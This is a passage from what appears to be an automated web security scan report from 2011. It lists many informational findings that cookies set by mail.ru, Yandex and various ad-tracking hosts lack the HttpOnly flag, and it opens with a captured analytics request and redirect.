GET /b/ss/kronos-dev/1/H.22.1/s64896461574826?AQB=1&ndh=1&t=25%2F3%2F2011%208%3A33%3A57%201%20300&ns=kronos&pageName=kronos&g=http%3A%2F%2Fwww.kronos.com%2F&cc=USD&ch=kronos&events=event3&c1=kronos&c2=kronos&v2=D%3Dch&v4=D%3Dc1&v5=D%3Dc2&c7=6%3A30AM&v7=D%3Dc7&c8=Monday&v8=D%3Dc8&c9=New&v9=D%3Dc9&c10=1&v10=D%3Dc10&c11=First%20Visit&v11=D%3Dc11&v12=%2B1&v13=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1125&bh=981&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: kronos.d1.sc.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 13:33:47 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DABC1D85079987-60000101000062A7[CE]; Expires=Sat, 23 Apr 2016 13:33:47 GMT; Domain=kronos.d1.sc.omtrdc.net; Path=/
Location: http://kronos.d1.sc.omtrdc.net/b/ss/kronos-dev/1/H.22.1/s64896461574826?AQB=1&pccr=true&vidn=26DABC1D85079987-60000101000062A7&&ndh=1&t=25%2F3%2F2011%208%3A33%3A57%201%20300&ns=kronos&pageName=kronos&g=http%3A%2F%2Fwww.kronos.com%2F&cc=USD&ch=kronos&events=event3&c1=kronos&c2=kronos&v2=D%3Dch&v4=D%3Dc1&v5=D%3Dc2&c7=6%3A30AM&v7=D%3Dc7&c8=Monday&v8=D%3Dc8&c9=New&v9=D%3Dc9&c10=1&v10=D%3Dc10&c11=First%20Visit&v11=D%3Dc11&v12=%2B1&v13=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1125&bh=981&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 24 Apr 2011 13:33:47 GMT
Last-Modified: Tue, 26 Apr 2011 13:33:47 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www8
Content-Length: 0
Content-Type: text/plain

16.82. http://mail.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mail.ru
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.83. http://map.media6degrees.com/orbserv/aopix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://map.media6degrees.com
Path:	/orbserv/aopix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

clid=2ljtllp01170xrd52zkwjuxh0e4d100837010i02408; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
rdrlst=40415xylk60qe00000002370113bolk7pyq0000000137010znmlk346200000003370110poljyxb4000000053701; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
sglst=2020s0t7ljyxb408snm00537010i02405ag3ljyxb408snm00537010i02405; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
vstcnt=417k010r014uzg6118e1002; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.84. http://mc.yandex.ru/watch/57617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mc.yandex.ru
Path:	/watch/57617

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

yandexuid=1458985311303741205; domain=.yandex.ru; path=/; expires=Thu, 22-Apr-2021 14:20:05 GMT
yabs-sid=377248491303741205; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.85. http://pda.loveplanet.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pda.loveplanet.ru
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.86. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.87. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Sun, 24-Jul-2011 14:34:49 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.88. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.rubiconproject.com
rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.pixel.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.89. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/dynamic_preroll_playlist.fmil

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
ymdt=0rO0ABXcSAAAEugAAA30AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:53:58 GMT; Path=/
ymvw=173_193_214_243_8AKTzxy2lLx8IW; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:53:58 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.90. http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pl.yumenetworks.com
Path:	/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
ymf=0rO0ABXcFAadrgwA*; Domain=.yumenetworks.com; Expires=Tue, 24-May-2011 14:54:01 GMT; Path=/
yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.91. http://pogoda.webalta.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pogoda.webalta.ru
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pogoda_reg=10290; expires=Tue, 24-Apr-2012 14:20:55 GMT; path=/; domain=.webalta.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.92. http://pretty.ru/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pretty.ru
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.93. http://r2.mail.ru/b12179277.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12179277.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=pPUGAEqlaAAA; expires=Wed, 24-Apr-13 14:20:49 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.94. http://r2.mail.ru/b12179279.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12179279.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=6ooGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.95. http://r2.mail.ru/b12179280.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12179280.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=t9UGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.96. http://r2.mail.ru/b12201458.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12201458.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=19oGAErbVQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.97. http://r2.mail.ru/b12526055.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526055.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=nt4GAFHdKwAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.98. http://r2.mail.ru/b12526056.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526056.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=EuwGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.99. http://r2.mail.ru/b12526057.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526057.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=gNkGAEnndQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.100. http://r2.mail.ru/b12526058.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526058.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=lfUGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.101. http://r2.mail.ru/b12526059.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526059.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=8uAGAEipQQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.102. http://r2.mail.ru/b12526060.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526060.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=V+YGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.103. http://r2.mail.ru/b12526061.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526061.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=SPYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.104. http://r2.mail.ru/b12526062.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526062.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=NOIGAEqT7AAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.105. http://r2.mail.ru/b12526063.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526063.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=S+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.106. http://r2.mail.ru/b12526064.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526064.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=JRMHAEzBGQAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.107. http://r2.mail.ru/b12526065.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526065.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=uuYGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.108. http://r2.mail.ru/b12526191.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526191.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=rPYGAEqlaAAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.109. http://r2.mail.ru/b12526192.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526192.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=vaYGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.110. http://r2.mail.ru/b12526193.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526193.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=lPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.111. http://r2.mail.ru/b12526194.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526194.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=kYsGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.112. http://r2.mail.ru/b12526208.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526208.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=cuMGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.113. http://r2.mail.ru/b12526210.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12526210.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=6usGAErxkwAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.114. http://r2.mail.ru/b12527647.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12527647.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=A+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.115. http://r2.mail.ru/b12529050.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12529050.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=eucGAEvDVAAA; expires=Wed, 24-Apr-13 14:21:27 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.116. http://r2.mail.ru/b12530142.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12530142.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=qBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.117. http://r2.mail.ru/b12530159.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12530159.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=qPsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.118. http://r2.mail.ru/b12531249.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12531249.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=vOoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.119. http://r2.mail.ru/b12531545.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12531545.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=NdYGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.120. http://r2.mail.ru/b12531624.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12531624.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=Z+kGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.121. http://r2.mail.ru/b12532203.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12532203.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=ueEGAEipQQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.122. http://r2.mail.ru/b12752186.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752186.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=iBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.123. http://r2.mail.ru/b12752583.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752583.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=NOkGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.124. http://r2.mail.ru/b12752584.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752584.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=K/QGAEvncgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.125. http://r2.mail.ru/b12752585.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752585.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=79sGAErbVQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.126. http://r2.mail.ru/b12752586.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12752586.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=z+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.127. http://r2.mail.ru/b12855502.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12855502.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=8twGAErJFgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.128. http://r2.mail.ru/b12887675.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12887675.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=QYwGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.129. http://r2.mail.ru/b12887676.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12887676.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=L/YGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.130. http://r2.mail.ru/b12887677.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12887677.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=AtoGAEnndQAA; expires=Wed, 24-Apr-13 14:21:35 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.131. http://r2.mail.ru/b12961140.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12961140.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=wfsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.132. http://r2.mail.ru/b12961154.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12961154.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=XOcGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.133. http://r2.mail.ru/b12961373.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r2.mail.ru
Path:	/b12961373.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p=0+oGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.134. http://r2.mail.ru/b12962356.jpg previous next

Summary

